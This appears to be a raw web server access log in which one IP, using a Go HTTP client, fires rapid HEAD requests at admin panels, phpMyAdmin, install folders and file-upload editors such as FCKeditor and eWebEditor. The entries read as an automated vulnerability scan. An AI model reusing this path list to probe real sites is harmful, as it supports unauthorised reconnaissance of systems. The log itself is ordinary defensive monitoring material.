121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /shsjms HTTP/1.1" 499 0 "http://www.cqqizhou.com/shsjms" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /phpmyadmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/phpmyadmin" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /database/web/Base HTTP/1.1" 499 0 "http://www.cqqizhou.com/database/web/Base" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /aspnet_client HTTP/1.1" 499 0 "http://www.cqqizhou.com/aspnet_client" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /WEB-INF HTTP/1.1" 499 0 "http://www.cqqizhou.com/WEB-INF" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /admin/editor/db HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/editor/db" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /admin/editor/UploadFile HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /FCKeditor/editor/dialog HTTP/1.1" 499 0 "http://www.cqqizhou.com/FCKeditor/editor/dialog" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /admin/wo%255Fedit/editor HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /aspnet_client/FreeTextBox HTTP/1.1" 499 0 "http://www.cqqizhou.com/aspnet_client/FreeTextBox" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /admin/editubb HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/editubb" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /intraAdmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/intraAdmin" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /dmtbdata HTTP/1.1" 499 0 "http://www.cqqizhou.com/dmtbdata" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /intraAdmin/class HTTP/1.1" 499 0 "http://www.cqqizhou.com/intraAdmin/class" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /system/eWebEditor HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /intraAdmin/phpmyadmin HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /edit/SysImage HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /aspnet_client/system_web HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /dwkx HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /syssite/install HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /eWebEditorNet/UploadFile HTTP/1.1" 499 0 "http://www.cqqizhou.com/eWebEditorNet/UploadFile" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /admin/editor/include HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/editor/include" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /system/eWebEditor/admin HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [31/Aug/2025:06:25:14 +0800] "HEAD /boke/Edit_Plus/FCKeditor/editor HTTP/1.1" 499 0 "http://www.cqqizhou.com/boke/Edit_Plus/FCKeditor/editor" "Go-http-client/1.1"
